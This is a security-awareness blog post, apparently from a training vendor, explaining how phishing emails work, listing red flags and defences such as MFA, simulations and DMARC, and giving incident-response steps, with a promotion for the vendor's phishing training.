One Phishing Email Cost This Company $100 Million

In 2019, a Lithuanian man named Evaldas Rimasauskas pleaded guilty to stealing over $100 million from Google and Facebook using nothing more than fraudulent invoices and carefully crafted phishing emails. He impersonated a legitimate hardware vendor, sent fake invoices to accounts payable departments, and walked away with nine figures before anyone noticed. No malware. No zero-day exploit. Just a convincing phishing email and a target who didn't look twice.

That's the reality I've been explaining to organizations for over a decade. The most expensive cybersecurity incidents don't start with sophisticated hacking. They start with someone opening an email and making a split-second decision to trust it.

This post breaks down exactly how phishing emails work, what they look like in 2026, and — most importantly — what you and your team can do to stop them before they become a seven-figure problem.

What Is a Phishing Email, Exactly?

A phishing email is a fraudulent message designed to trick the recipient into revealing sensitive information, clicking a malicious link, or downloading harmful attachments. It's social engineering delivered to your inbox. The threat actor behind it is impersonating someone you trust — your bank, your boss, a vendor, or a platform like Microsoft 365.

According to the Verizon Data Breach Investigations Report, phishing remains one of the top initial access vectors in confirmed data breaches year after year. The FBI's IC3 received over 298,000 phishing complaints in 2023 alone, making it the most reported cybercrime category by a wide margin.

Here's what separates phishing from spam: intent. Spam is annoying. Phishing is adversarial. A threat actor has a specific goal — credential theft, ransomware deployment, wire fraud, or data exfiltration — and your inbox is the entry point.

The Anatomy of a Modern Phishing Email

I've reviewed thousands of phishing emails in incident response engagements. The old "Nigerian prince" template is dead. Today's phishing emails are polished, personalized, and nearly indistinguishable from legitimate correspondence. Here's what makes them work.

Spoofed Sender Addresses

Threat actors register domains that look almost identical to the real thing. Instead of microsoft.com, you might see micros0ft-support.com or microsoft.com.mailserver99.net. Some attackers compromise legitimate email accounts outright, making the "From" address 100% authentic. That's why you can't rely on sender address alone.

Urgency and Authority

The most effective phishing emails create pressure. "Your account will be suspended in 24 hours." "The CEO needs this wire transfer completed before end of business." "Your password has been compromised — reset immediately." These messages exploit your instinct to act fast and ask questions later.

Convincing Landing Pages

Click the link in a modern phishing email and you'll land on a page that looks pixel-perfect. Attackers clone login portals from Microsoft, Google, banks, and HR platforms. They use valid SSL certificates, so you'll even see the padlock icon. I've seen credential harvesting pages hosted on legitimate cloud services like Azure and AWS, which makes URL filtering almost useless without deeper inspection.

Malicious Attachments

PDFs with embedded links, Excel files with macro payloads, HTML attachments that render a fake login page locally in your browser — these are all standard tactics. In my experience, the HTML attachment method has surged in the last two years because it bypasses many email gateway scanners.

The $4.88M Lesson Most Organizations Learn Too Late

IBM's Cost of a Data Breach Report pegged the global average cost of a data breach at $4.88 million in 2024. Phishing was consistently among the top initial attack vectors. That cost includes forensic investigation, legal fees, regulatory fines, notification expenses, and the hardest one to quantify — reputational damage.

But here's what I want you to internalize: the breach doesn't start with the phishing email. It starts with the click. And the click happens because your people weren't trained to recognize the threat.

That's why I built our phishing awareness training for organizations — to give your employees realistic, scenario-based practice identifying phishing emails before a real one hits their inbox.

5 Red Flags That Expose a Phishing Email

I train people to look for these five signals every time they open a message. None of them alone is definitive, but two or more together should trigger immediate suspicion.

1. Mismatched URLs

Hover over every link before you click. If the display text says "Microsoft Login" but the actual URL points to login-msft.sketchydomain.ru, that's your answer. On mobile, long-press the link to preview it. This single habit stops a massive percentage of successful phishing attempts.

2. Generic Greetings in Targeted Context

If your "bank" emails you with "Dear Customer" instead of your actual name, be suspicious. Legitimate services almost always personalize communications. That said, sophisticated spear-phishing will use your real name — so this is a starting indicator, not a final verdict.

3. Grammar and Formatting Inconsistencies

This red flag is less reliable than it used to be. Generative AI has dramatically improved the quality of phishing copy. But you'll still catch inconsistencies: mismatched fonts, incorrect logos, unusual spacing, or British English in a message supposedly from an American company. Pay attention to the details.

4. Unexpected Attachments

If you didn't request a document and weren't expecting one, don't open it. This is especially true for file types like .html, .exe, .iso, and macro-enabled Office files (.xlsm, .docm). Call the sender directly using a known phone number to verify.

5. Pressure Tactics and Emotional Manipulation

Any email that demands immediate action, threatens consequences, or creates a sense of panic is designed to bypass your critical thinking. "Your account has been compromised" and "Failure to respond will result in legal action" are classic examples. Legitimate organizations give you time and multiple channels to respond.

Why Email Filters Alone Won't Save You

I hear this constantly: "We have a secure email gateway. We're covered." No, you're not. Email security tools are essential, but they're not infallible. Here's why.

Threat actors constantly test their payloads against popular email filters before launching campaigns. They use link shorteners, redirect chains, and time-delayed payloads that appear clean during initial scanning but activate after delivery. They compromise trusted sender domains, which sail right through SPF, DKIM, and DMARC checks.

CISA has repeatedly emphasized that technical controls must be paired with human-layer defenses. Your email filter is a safety net. Security awareness is the guardrail that keeps people off the cliff in the first place.

Building a Human Firewall Against Phishing

Technical defenses reduce volume. Training reduces impact. You need both. Here's the practical framework I recommend to every organization I work with.

Deploy Phishing Simulations Regularly

Monthly phishing simulations are the single most effective training tool I've seen. Not annual. Not quarterly. Monthly. The goal isn't to punish people who click — it's to build pattern recognition through repetition. Track click rates, report rates, and credential submission rates over time. You should see improvement within 90 days.

Implement Multi-Factor Authentication Everywhere

Even when a phishing email successfully harvests credentials, multi-factor authentication (MFA) blocks the attacker from using them. This is your most critical technical backstop. Prioritize phishing-resistant MFA methods like FIDO2 security keys over SMS-based codes, which are vulnerable to SIM-swapping attacks.

Adopt Zero Trust Principles

Zero trust means "never trust, always verify" — whether the request comes from inside or outside your network. Apply least-privilege access, segment your network, and require continuous authentication. A phishing email that compromises one set of credentials should not give a threat actor the keys to the kingdom.

Create a Reporting Culture

Your employees need a one-click way to report suspicious emails, and they need to know that reporting is rewarded, not penalized. Organizations with strong reporting cultures catch phishing campaigns faster and contain breaches earlier. Install a "Report Phish" button in your email client and celebrate the people who use it.

Train Continuously, Not Annually

Compliance-driven annual training checks a box. It doesn't change behavior. Effective cybersecurity awareness training delivers short, frequent, scenario-based lessons that keep phishing recognition top of mind. Pair it with simulated phishing exercises for maximum impact.

What to Do When Someone Clicks a Phishing Email

It's going to happen. Even in well-trained organizations, someone will eventually click. Your response speed determines whether it's an incident or a catastrophe.

Immediate steps:

  • Disconnect the affected device from the network immediately. Wi-Fi off, Ethernet unplugged.
  • Reset the user's credentials from a separate, known-clean device. Include all linked accounts.
  • Revoke active sessions for the compromised account in your identity provider.
  • Scan the device for malware using your EDR tool. Quarantine if anything is detected.
  • Check email rules on the compromised account. Attackers frequently create auto-forwarding rules to maintain access even after a password reset.
  • Notify your security team or managed security provider. Document everything.

If credentials were entered on a phishing page, assume they're compromised. If the phishing email contained a ransomware payload, activate your incident response plan and consider engaging legal counsel before paying any ransom demand.

Phishing in 2026: What's Changed

The phishing landscape has shifted significantly. Here's what I'm seeing in the field right now.

AI-Generated Phishing at Scale

Generative AI tools have eliminated the language barrier that once made many phishing emails easy to spot. Threat actors now generate grammatically flawless, contextually appropriate phishing emails in any language, at volume. The days of catching phishing by looking for typos are largely behind us.

QR Code Phishing (Quishing)

Attackers embed malicious QR codes in emails, bypassing traditional URL scanning. The recipient scans the code with their phone — which typically lacks the same security controls as their work laptop — and lands on a credential harvesting page. I've seen these disguised as MFA setup instructions, parking notifications, and HR benefit enrollment forms.

Business Email Compromise Remains Dominant

The FBI IC3 has reported that business email compromise (BEC) — a targeted form of phishing — continues to cause the highest financial losses of any cybercrime category. These attacks don't use malware. They use trust, urgency, and impersonation to redirect legitimate business payments to attacker-controlled accounts.

Your Phishing Defense Checklist

Here's the practical summary you can hand to your leadership team or IT department today:

  • Deploy phishing-resistant MFA on all accounts, prioritizing email and financial systems.
  • Run monthly phishing simulations and track metrics over time.
  • Implement a "Report Phish" button in all email clients.
  • Enable SPF, DKIM, and DMARC on your email domain with a reject policy.
  • Restrict macro execution in Office documents via group policy.
  • Train employees with realistic, scenario-based content — not slide decks.
  • Establish and rehearse an incident response plan for credential compromise.
  • Apply zero trust architecture principles to limit blast radius.

Every one of these controls reduces your exposure. Combined, they make your organization a significantly harder target.

Start Training Before the Next Phishing Email Lands

I've investigated breaches that started with a single phishing email sent on a Tuesday afternoon to a mid-level employee who was distracted, busy, and had never seen a simulated phish in their life. That's the scenario I want you to prevent.

Enroll your team in our phishing awareness training program to give them hands-on practice with realistic phishing scenarios. And if you're building a broader security culture, our cybersecurity awareness training covers everything from social engineering to ransomware defense.

The next phishing email targeting your organization is already being drafted. The question is whether your people will recognize it — or fund someone's next payday.